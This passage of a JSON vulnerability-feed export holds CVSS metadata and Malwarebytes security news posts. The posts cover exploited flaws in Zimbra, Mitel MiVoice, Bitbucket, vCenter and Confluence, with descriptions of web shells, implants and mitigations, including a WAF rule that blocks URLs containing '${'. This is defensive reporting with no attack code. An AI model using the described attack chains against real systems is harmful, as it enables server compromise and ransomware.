"PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-27T00:00:00", "id": "CPAI-2021-0728", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2022-08-18T00:02:01", "description": "Researchers at [Volexity](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) have discovered that a known vulnerability has been used in a large scale attack against Zimbra Collaboration Suite (ZCS) email servers. But the vulnerability was supposed to be hard to exploit since it required authentication. So they decided to dig deeper.\n\n## An incomplete fix\n\nZimbra is a brand owned by [Synacor](<https://synacor.com/about-us>). Zimbra Collaboration, formerly known as the Zimbra Collaboration Suite (ZCS) is a collaborative software suite that includes an email server and a web client. It is widely used across different industries and government organizations. We reported about a cross-site scripting (XSS) [zero-day vulnerability in the Zimbra email platform](<https://www.malwarebytes.com/blog/news/2022/02/threat-actor-steals-email-with-zimbra-zero-day>) back in February 2022. At the time, Zimbra claimed there were 200,000 businesses, and over a thousand government and financial institutions, using its software.\n\nThe initial investigations showed evidence indicating the likely cause of these breaches was exploitation of [CVE-2022-27925](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27925>), a remote-code-execution (RCE) vulnerability in ZCS. 
This vulnerability was patched by Zimbra in March 2022.\n\nThe description of the CVE informs us that Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has _mboximport_ functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal.\n\nZimbra patched the vulnerability, but, in the company's own words, it would turn out to be an \"incomplete fix for CVE-2022-27925\".\n\n## Mass exploitation\n\nIt is uncommon for a vulnerability that requires administrator rights to be used in a large-scale attack. Firstly, because it is usually a lot of work for a cybercriminal to obtain valid administrator credentials. But also because once they have administrator credentials there are a lot more options open to them. Although in this case, uploading zip files that will be auto-magically extracted sounds like a good way to establish a foothold.\n\nSo how did it come about that a serious, yet hard-to-exploit vulnerability got involved in a larger attack rather than a targeted one? The researchers did a lot of digging and found that the threat actors were chaining the known vulnerability with a zero-day path traversal vulnerability. The authentication bypass vulnerability was assigned [CVE-2022-37042](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37042>) after sharing their findings with Zimbra. A path traversal vulnerability allows an attacker to access files on your web server to which they should not have access.\n\nThe underlying problem was that the authentication check, after sending an error message to the unauthenticated attacker, continued executing the subsequent code. So, even though the attackers received an error message, the web shell was planted on the server anyway. These web shells are malicious scripts used by the attacker with the intent to escalate and maintain persistent access. 
In other words, a backdoor.\n\nKnowing the paths to which the attacker had installed web shells, and the behavior of ZCS when contacting a URL that did not exist, the researchers performed a scan of ZCS instances in the wild to identify third-party compromises using the same web shell names. This scan yielded over 1,000 infected ZCS instances worldwide. The real number of infected instances is probably a lot higher since the scan only looked for shell paths known to the researchers.\n\n## Mitigation\n\nZimbra has patched the authentication issue in its [9.0.0P26](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P26>) and [8.8.15P33](<https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P33>) releases. If you were late to patch for the RCE vulnerability, you should assume that your server instance has been compromised.\n\nIn order to verify the presence of web shells on a ZCS instance, one technique that can be used is to compare the list of JSP files on a Zimbra instance with those present by default in Zimbra installations. 
Lists of valid JSP files included in Zimbra installations can be found [on GitHub](<https://github.com/volexity/threat-intel/tree/main/2022/2022-08-10%20Mass%20exploitation%20of%20\\(Un\\)authenticated%20Zimbra%20RCE%20CVE-2022-27925>) for the latest version of 8.8.15 and of 9.0.0.\n\n## Update August 17, 2022\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) have published a joint [Cybersecurity Advisory (CSA)](<https://www.cisa.gov/uscert/sites/default/files/publications/aa22-228a-threat-actors-exploiting-multiple-cves-against-zimbra.pdf>) in response to the active exploitation of the vulnerabilities in the Zimbra Collaboration Suite (ZCS).\n\nStay safe, everyone!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-11T13:00:00", "type": "malwarebytes", "title": "[updated] Thousands of Zimbra mail servers backdoored in large scale attack", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-11T13:00:00", "id": "MALWAREBYTES:FD1933FDD45B339A42C8A69C46589A0D", 
"href": "https://www.malwarebytes.com/blog/news/2022/08/thousands-of-zimbra-mail-servers-backdoored-in-large-scale-attack", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-01-16T00:11:16", "description": "Ransomware gangs have shown that they can play a long game, so it shouldn't come as a surprise to learn of one prepared to wait months to make use of a compromised system.\n\nS-RM's Incident Response team [shared details](<https://insights.s-rminform.com/lorenz-cyber-intelligence-briefing-special>) of a campaign attributed to the Lorenz ransomware group that exploited a specific vulnerability to plant a backdoor that wasn't used until months later.\n\n## Lorenz\n\nThe Lorenz ransomware group first appeared on the radar in 2021. They have targeted organizations all over the world and are known to specialize in VoIP vulnerabilities to access their victims' environments. Like many ransomware groups, they steal their victim's data before encrypting it, so they can add the threat of leaked data to the threat of encryption making it irrecoverable.\n\n## Vulnerability\n\nThe researchers found in a specific case that the Lorenz group was able to exploit a vulnerability listed as [CVE-2022-29499](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29499>) a week prior to it being patched. This vulnerability, which has a CVSS score of 9.8 out of 10, exists in the Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 and allows remote code execution because of incorrect data validation. 
Essentially the vulnerability allowed an unauthenticated remote attacker to send specially crafted requests to inject commands and achieve remote code execution.\n\n## Exploited\n\nAfter a vulnerability has been [discovered](<https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/>) and [patched](<https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-22-0002>), it is not uncommon for organizations to wait for a convenient moment to apply the patch. But as soon as a patch is made available, threat actors have the opportunity to reverse engineer it, find the vulnerability, create an exploit, and then scan for vulnerable systems. It's exactly this window of opportunity that the Lorenz ransomware group managed to exploit, in order to install a web shell on the vulnerable system. This web shell has a unique name and requires credentials to access the system.\n\nThe shell was placed some five months before the actual ransomware event, and sat dormant throughout that period. Whether the backdoor was created by an [Initial Access Broker (IAB)](<https://www.malwarebytes.com/blog/business/2022/11/initial-access-brokers-iabs-3-ways-they-break-into-corporate-networks-and-how-to-detect-them>) and then sold on to the ransomware group or whether the Lorenz group created it themselves is unknown. But the result is the same.\n\n## Why wait?\n\nThe time between the compromise and the deployment of the ransomware can be explained by several theories.\n\n * The backdoor was planted by an IAB that waited for the right offer to sell off their access to the compromised system.\n * When an easy-to-exploit vulnerability is available, a group will first compromise as many systems as possible and later work their way through the list of victims.\n * With the initial breach the threat actor replaced several key artefacts on the perimeter CentOS system, effectively blocking the creation of any additional logging or audit data. 
After a while old logs will be deleted and no new ones are created, which improves the attacker's chances of going in undetected.\n\n## Patching\n\nBesides showing us how important it is to [patch in a timely fashion](<https://www.malwarebytes.com/business/vulnerability-patch-management>), this vulnerability has shown us that patching alone is not always enough.\n\nVictims were compromised through this vulnerability before a patch was available. The vulnerability was found by investigating a suspected ransomware intrusion attempt, so there was at least one group that was able to use the vulnerability when it was still a [zero-day](<https://www.malwarebytes.com/glossary/zero-day>).\n\nThe exploit details were published in June and the victim patched in July, but was compromised a week prior to patching. So, the backdoor was planted during the time between the patch being released and it actually getting installed, the so-called \"patch gap\".\n\n## Monitoring\n\nSo, what else do we need to do in case we patch a vulnerable system? A difficult question with no easy cure-all answer. But there are some pieces of advice we can give:\n\n * Keep the patch gap as small as possible. We know it's not easy, but it helps a lot.\n * Check vulnerable devices before and after patching for indicators of compromise (IOCs). They may not always be available, but when it concerns a vulnerability that's known to have been exploited you may be able to find the IOCs or figure out where to look.\n * Constant monitoring. If you didn't find the backdoor, make sure you have the capabilities to find the tools threat actors use for lateral movement, and block the final payload (ransomware in this case).\n * Look for unauthorized access or atypical behavior originating from the recently patched device/system.\n\n* * *\n\n**We don't just report on threats--we remove them**\n\nCybersecurity risks should never spread beyond a headline. 
Keep threats off your devices by [downloading Malwarebytes today](<https://www.malwarebytes.com/for-home>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-15T18:45:00", "type": "malwarebytes", "title": "Timely patching is good, but sometimes it's not enough", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2023-01-15T18:45:00", "id": "MALWAREBYTES:58E222D9BD3FC1273D169FE26CA6D804", "href": "https://www.malwarebytes.com/blog/news/2023/01/timely-patching-is-good-but-does-not-provide-full-ransomware-protection", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-04T00:04:30", "description": "On September 29, 2022 the Cybersecurity & Infrastructure Security Agency (CISA) added three vulnerabilities to the [catalog of known to be exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). One of them is [a vulnerability in Atlassian's Bitbucket Server and Data Center](<https://www.cisa.gov/uscert/ncas/current-activity/2022/09/23/cisa-has-added-one-known-exploited-vulnerability-catalog>). 
The other two are the [Exchange Server zero-day vulnerabilities](<https://www.malwarebytes.com/blog/news/2022/09/two-new-exchange-zero-days-that-look-and-feel-like-proxyshell-part-2>) we wrote about last week.\n\nThe Bitbucket vulnerability is no zero-day. Fixed versions were made available on August 24, 2022. The vulnerability allows an attacker who has read permissions to execute arbitrary code by sending a malicious HTTP request.\n\n## Mitigation\n\nAll versions of Bitbucket Server and Data Center released after 6.10.17, including 7.0.0 and newer, are affected. Atlassian recommends that you upgrade your instance to one of the versions listed below.\n\n| Supported Version | Bug Fix Release |\n|---|---|\n| [Bitbucket Server and Data Center 7.6](<https://confluence.atlassian.com/bitbucketserver/bitbucket-server-7-6-release-notes-1018780800.html>) | 7.6.17 ([LTS](<https://confluence.atlassian.com/enterprise/long-term-support-releases-948227420.html>)) or newer |\n| [Bitbucket Server and Data Center 7.17](<https://confluence.atlassian.com/bitbucketserver/bitbucket-data-center-and-server-7-17-release-notes-1086401305.html>) | 7.17.10 ([LTS](<https://confluence.atlassian.com/enterprise/long-term-support-releases-948227420.html>)) or newer |\n| [Bitbucket Server and Data Center 7.21](<https://confluence.atlassian.com/bitbucketserver/bitbucket-data-center-and-server-7-21-release-notes-1115129015.html>) | 7.21.4 ([LTS](<https://confluence.atlassian.com/enterprise/long-term-support-releases-948227420.html>)) or newer |\n| [Bitbucket Server and Data Center 8.0](<https://confluence.atlassian.com/bitbucketserver/bitbucket-data-center-and-server-8-0-release-notes-1115659343.html>) | 8.0.3 or newer |\n| [Bitbucket Server and Data Center 8.1](<https://confluence.atlassian.com/bitbucketserver/bitbucket-data-center-and-server-8-1-release-notes-1130726463.html>) | 8.1.3 or newer |\n| [Bitbucket Server and Data Center 
8.2](<https://confluence.atlassian.com/bitbucketserver/bitbucket-data-center-and-server-8-2-release-notes-1130729887.html>) | 8.2.2 or newer |\n| [Bitbucket Server and Data Center 8.3](<https://confluence.atlassian.com/bitbucketserver/bitbucket-data-center-and-server-8-3-release-notes-1141987753.html>) | 8.3.1 or newer |\n\nYou can download the latest version of Bitbucket from the [download center](<https://www.atlassian.com/software/bitbucket/download-archives>). Visit [the Frequently Asked Questions (FAQ)](<https://confluence.atlassian.com/kb/faq-for-cve-2022-36804-1157481722.html>) page if you have any questions.\n\nIf, for any reason, you are unable to apply the security updates, you are advised to apply a temporary partial mitigation by turning off public repositories, setting the option feature.public.access to false. This blocks unauthorized users from accessing the repository.\n\nIf you access Bitbucket via a bitbucket.org domain, it is hosted by Atlassian and you are not affected by the vulnerability.\n\n## Vulnerability\n\nThe Remote Code Execution vulnerability was found by [Maxwell Garret](<https://twitter.com/TheGrandPew>), a security researcher at [Assetnote](<https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/>), and assigned [CVE-2022-36804](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804>). The vulnerability was rated as critical, which indicates a [CVSS score](<https://www.malwarebytes.com/blog/news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities>) between 9 and 10 out of 10. If an attacker can read the content of a repository, either because it is a public repository or because they have read permission on a private repository, they are able to exploit the vulnerability.\n\n## Discovery\n\nBitbucket is a web-based hosting service that distributes source code and development projects. 
Typically, Bitbucket Server is deployed on-premises and allows uploads of source code from GitHub and other platforms. Bitbucket uses git for many operations within the software. The discovery was inspired by the blog post from William Bowling about his [RCE via git option injection in GitHub Enterprise](<https://devcraft.io/2020/10/18/github-rce-git-inject.html>).\n\n## Exploitation\n\nThe proof-of-concept (PoC) exploit was made [public](<https://twitter.com/TheGrandPew/status/1571847052962975745>) on September 19, 2022. Attackers did not wait long. Some were [observed scanning](<https://twitter.com/Balgan/status/1573363247239278594>) for vulnerable instances as early as September 20th.\n\nBesides CISA adding the vulnerability to the known to be exploited vulnerabilities list, the Belgian federal cyber emergency team (CERT.be) warned that an exploit kit is now available for CVE-2022-36804 and urged users to patch.\n\n> WARNING: An exploit kit is now available for CVE-2022-36804 affecting [@Atlassian](<https://twitter.com/Atlassian?ref_src=twsrc%5Etfw>) [@Bitbucket](<https://twitter.com/Bitbucket?ref_src=twsrc%5Etfw>) Server and Data Center. More information on <https://t.co/ccK9ng8j58> \nIf you haven't done so already, it's time to [#patch](<https://twitter.com/hashtag/patch?src=hash&ref_src=twsrc%5Etfw>) [#patch](<https://twitter.com/hashtag/patch?src=hash&ref_src=twsrc%5Etfw>) [#patch](<https://twitter.com/hashtag/patch?src=hash&ref_src=twsrc%5Etfw>) <https://t.co/fytm6ZEGiw>\n> \n> -- CERT.be (@certbe) [September 27, 2022](<https://twitter.com/certbe/status/1574758255032680450?ref_src=twsrc%5Etfw>)\n\nNow that CISA has set a to-be-patched date of October 21, 2022, the vulnerability will move higher on the agenda for US Federal Civilian Executive Branch (FCEB) agencies. 
As always, all other organizations are advised to [patch](<https://www.malwarebytes.com/business/vulnerability-patch-management>) urgently if they haven't already.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T12:00:00", "type": "malwarebytes", "title": "Actively exploited vulnerability in Bitbucket Server and Data Center", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-36804"], "modified": "2022-10-03T12:00:00", "id": "MALWAREBYTES:DCC5A065F75E0F7E276C99A5D4F5979C", "href": "https://www.malwarebytes.com/blog/news/2022/10/warnings-about-actively-exploited-vulnerability-in-bitbucket-server-and-data-center", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-28T20:35:10", "description": "### Last week on Malwarebytes Labs\n\n * Freedom Hosting operator [gets 27 years](<https://blog.malwarebytes.com/cybercrime/2021/09/freedom-hosting-operator-gets-27-years-for-hosting-dark-web-child-abuse-sites/>) for hosting dark web abuse sites\n * Microsoft makes a [bold move](<https://blog.malwarebytes.com/opinion/2021/09/microsoft-makes-a-bold-move-towards-a-password-less-future/>) towards a password-less future\n * New Mac malware masquerades as [iTerm2, remote desktop and other apps](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/new-mac-malware-masquerades-as-iterm2-remote-desktop-and-other-apps/>)\n * Internet safety tips for kids and teens: a [comprehensive guide](<https://blog.malwarebytes.com/how-tos-2/2021/09/internet-safety-tips-for-kids-and-teens-a-comprehensive-guide-for-the-modern-parent/>) for the modern parent\n * Google, geofence 
warrants, [and you](<https://blog.malwarebytes.com/privacy-2/2021/09/google-geofence-warrants-and-you/>)\n * No, Colonel Gaddafi\u2019s daughter isn\u2019t [emailing to give you untold riches](<https://blog.malwarebytes.com/social-engineering/2021/09/no-colonel-gaddafis-daughter-isnt-emailing-to-give-you-untold-riches/>)\n * Patch vCenter Server \u201c[right now](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/>)\u201d, VMWare expects CVE-2021-22005 exploitation within minutes of disclosure\n * [Patch now](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-insecure-hikvision-security-cameras-can-be-taken-over-remotely/>)! Insecure Hikvision security cameras can be taken over remotely\n * MSHTML [attack targets Russian state rocket centre](<https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/>) and interior ministry\n * Italian mafia cybercrime sting leads to [100+ arrests](<https://blog.malwarebytes.com/scams/2021/09/italian-mafia-cybercrime-sting-leads-to-100-arrests/>)\n * How to [clear your cache](<https://blog.malwarebytes.com/101/how-tos/2021/09/how-to-clear-your-cache/>)\n * Microsoft exchange autodiscover flaw [reveals users\u2019 passwords](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/microsoft-exchange-autodiscover-flaw-reveals-users-passwords/>)\n * Parents and teachers believe digital surveillance of kids [outweighs risks](<https://blog.malwarebytes.com/privacy-2/2021/09/parents-and-teachers-believe-digital-surveillance-of-kids-outweighs-risks/>)\n * SonicWall warns users to [patch critical vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/sonicwall-warns-users-to-patch-critical-vulnerability-as-soon-as-possible/>) \u201cas soon as possible\u201d\n * Beware! 
Uber scam [lures victims](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/beware-uber-scam-lures-victims-with-alert-from-a-real-uber-number/>) with alert from a real Uber number\n * Teaching [cybersecurity skills to special needs children](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/teaching-cybersecurity-skills-to-special-needs-children-with-alana-robinson-lock-and-code-s02e18/>) with Alana Robinson: Lock and Code S02E18\n\n### Other cybersecurity news\n\n * UK ministry of defence [apologises](<https://www.theregister.com/2021/09/23/afghan_email_fail_ministry_defence/>) - again - after another major email blunder in Afghanistan (Source: The Register)\n * Database containing personal info of 106 million international visitors to Thailand [exposed](<https://www.comparitech.com/blog/information-security/thai-traveler-data-leak/>) online (Source: Comparitech)\n * Fake WhatsApp backup message [delivers malware](<https://portswigger.net/daily-swig/fake-whatsapp-backup-message-delivers-malware-to-spanish-speakers-devices>) to Spanish speakers\u2019 devices (Source: The Daily Swig)\n * Mobile phones of 5 French cabinet ministers [infected by Pegasus malware](<https://www.france24.com/en/europe/20210924-mobile-phones-of-five-french-cabinet-ministers-infected-by-pegasus-malware>) (Source: France 24)\n * Ransomware dropping malware swaps phishing for [sneaky new attack route](<https://www.zdnet.com/article/this-ransomware-dropping-malware-has-swapped-phishing-for-a-sneaky-new-attack-route/>) (Source: ZDNet)\n * Phishing attacks more sophisticated, malicious emails [timed to coincide](<https://www.cpomagazine.com/cyber-security/phishing-attacks-more-sophisticated-malicious-emails-timed-to-coincide-with-periods-of-low-energy-and-inattentiveness/>) with periods of low energy and inattentiveness (Source: CPO magazine)\n * Keeping your data [secure at work](<https://minutehack.com/news/keeping-your-data-secure-at-work>) (Source: Minute Hack)\n\nStay safe, 
everyone!\n\nThe post [A week in security (Sept 20 \u2013 Sept 26)](<https://blog.malwarebytes.com/a-week-in-security/2021/09/a-week-in-security-sept-20-sept-26-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-27T11:01:42", "type": "malwarebytes", "title": "A week in security (Sept 20 \u2013 Sept 26)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-27T11:01:42", "id": "MALWAREBYTES:F776F8D86D7BD9350BDC23F1E51B31BF", "href": "https://blog.malwarebytes.com/a-week-in-security/2021/09/a-week-in-security-sept-20-sept-26-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T20:35:11", "description": "VMware is urging users of vCenter Server to patch no fewer than [19 problems](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) affecting its products. \n\nThese updates fix a variety of security vulnerabilities, but one of them is particularly nasty. That would be [CVE-2021-22005](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22005>), a critical file upload vulnerability with a CVSS score of 9.8 out of 10.\n\nIt's so bad the company is advising users to **sort it out "[right now](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>)"**:\n\n> These updates fix a critical security vulnerability, and your response needs to be considered at once. Organizations that practice change management using the ITIL definitions of change types would consider this an \u201cemergency change.\u201d\n\n### CVE-2021-22005\n\nvCenter Server is a way to [manage large infrastructure](<https://geek-university.com/vmware-esxi/what-is-vcenter-server/>). If you have lots of hosts and virtual machines, this is a very good way to manage every aspect of your setup. 
With this in mind, if someone manages to compromise your vCenter, it probably won't end well.\n\nAnd that's exactly what CVE-2021-22005 does. It's a file upload vulnerability and anyone with access to vCenter Server over a network can exploit it. The configuration settings of vCenter Server don't make any difference. If criminals get network access, they can upload a specially made file and use it to execute code on the vCenter Server.\n\nAs VMware points out, bad actors are often already in your network. They wait patiently to strike. It's likely they'll exfiltrate data slowly and nobody will ever know they're there. Being able to snag a win like this for themselves could increase the threat from ransomware and other malicious activity.\n\n### What should I do?\n\nWell, patching immediately is definitely the [go-to advice](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>). VMware acknowledges that an emergency patch may fall outside how you usually do things, but it really does impress upon readers that patching needs to be done as soon as possible. It is, perhaps, unusual (and refreshing) to see an organisation stress this fact so plainly, so kudos for being so forthright.\n\n### Is my vCenter setup affected by this?\n\nIt depends. Some versions, such as vCenter Server 6.5, are not affected. Others are. You should refer to the [dedicated rundown on](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>) this issue and take appropriate action as soon as you possibly can. 
We'll leave the last word to VMware with regard to when you should be patching:\n\n> Immediately, the ramifications of this vulnerability are serious and it is a matter of time \u2013 likely minutes after the disclosure \u2013 before working exploits are publicly available.\n> \n> With the threat of ransomware looming nowadays the safest stance is to assume that an attacker may already have control of a desktop and a user account through the use of techniques like phishing or spearphishing, and act accordingly. This means the attacker may already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence.\n\nThis seems like very good advice.\n\nThe post [Patch vCenter Server "right now", VMWare expects CVE-2021-22005 exploitation within minutes of disclosure](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-22T11:27:11", "type": "malwarebytes", "title": "Patch vCenter Server \u201cright now\u201d, VMWare expects CVE-2021-22005 exploitation within minutes of disclosure", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-22T11:27:11", "id": "MALWAREBYTES:8791EE404FCD2E2A063F220E6486B422", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-03T21:56:15", "description": "[Researchers](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>) found a vulnerability in Atlassian Confluence by conducting an incident response investigation. 
Atlassian rates the severity level of this vulnerability as critical.\n\nAtlassian has issued a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) and is working on a fix for the affected products. This qualifies the vulnerability as an actively exploited, in-the-wild zero-day vulnerability.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This vulnerability is listed as [CVE-2022-26134](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134>).\n\n## Confluence\n\nAtlassian Confluence is a collaboration tool in wiki style. Confluence is a team collaboration platform that connects teams with content, knowledge, and their co-workers, which helps them find all the relevant information in one place. Teams use it to work together on projects and share knowledge.\n\nConfluence Server is the on-premises version, which is being phased out. Confluence Data Center is the self-managed enterprise edition of Confluence.\n\n## The vulnerability\n\nThe description of CVE-2022-26134 says it is a critical unauthenticated remote code execution vulnerability in Confluence Server and Confluence Data Center.\n\nDuring the investigation, the researchers found JSP web shells written to disk. JSP (Jakarta Server Pages or Java Server Pages) is a server-side programming technology that helps software developers create dynamically generated web pages based on HTML, XML, SOAP, or other document types. JSP is similar to PHP and ASP, but uses the Java programming language.\n\nIt became clear that the server compromise stemmed from an attacker launching an exploit to achieve remote code execution. 
The researchers were able to recreate that exploit and identify a zero-day vulnerability impacting fully up-to-date versions of Confluence Server.\n\nAfter the researchers contacted Atlassian, Atlassian confirmed the vulnerability and subsequently assigned the issue to CVE-2022-26134. It confirmed the vulnerability works on current versions of Confluence Server and Data Center.\n\n## The attack\n\nThe researchers at Volexity were unwilling to provide any details about the attack method since there is no patch available for this vulnerability. However, they were able to provide some details about the shells that were dropped by exploiting the vulnerability.\n\nA web shell is a malicious script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)\n\nThis web shell was identified as the China Chopper web shell. The China Chopper web shell is commonly used by malicious Chinese actors, including advanced persistent threat (APT) groups, to remotely control web servers. The web shell has two parts, the client interface and the small (4 kilobytes in size) receiver host file on the compromised web server. But access logs seemed to indicate that the China Chopper web shell only served as a means of secondary access.\n\nOn further investigation they found bash shells being launched by the Confluence web application process. This stood out because it had spawned a bash process which spawned a Python process that in turn spawned a bash shell. Bash is the default shell for many Linux distros and is short for the GNU Bourne-Again Shell.\n\nResearch showed that the web server process as well as the child processes created by the exploit were all running as the root user and group (with full privileges). 
These types of vulnerabilities are dangerous, as they allow attackers to execute commands and gain full control of a vulnerable system. They can even do this without valid credentials as long as it is possible to make web requests to the Confluence system.\n\nAfter successfully exploiting the Confluence Server systems, the attacker immediately deployed an in-memory copy of the BEHINDER implant. BEHINDER provides very powerful capabilities to attackers, including memory-only web shells and built-in support for interaction with [Meterpreter](<https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/>) and [Cobalt Strike](<https://blog.malwarebytes.com/glossary/cobalt-strike/>).\n\n## Mitigation\n\nThere are currently no fixed versions of Confluence Server and Data Center available. In the interim, users should work with their security team to consider the best course of action. Options to consider include:\n\n * Restricting access to Confluence Server and Data Center instances from the internet.\n * Disabling Confluence Server and Data Center instances.\n * If you are unable to take the above actions, implementing a WAF (Web Application Firewall) rule which blocks URLs containing **${** may reduce your risk.\n\n_Note: **${** is the first part of a parameter substitution in a shell script_\n\n## Affected versions\n\nAll supported versions of Confluence Server and Data Center are affected. And according to Atlassian it\u2019s likely that **all** versions of Confluence Server and Data Center are affected, but they are still investigating and have yet to confirm the earliest affected version.\n\nOne important exception: if you access your Confluence site via an atlassian.net domain. 
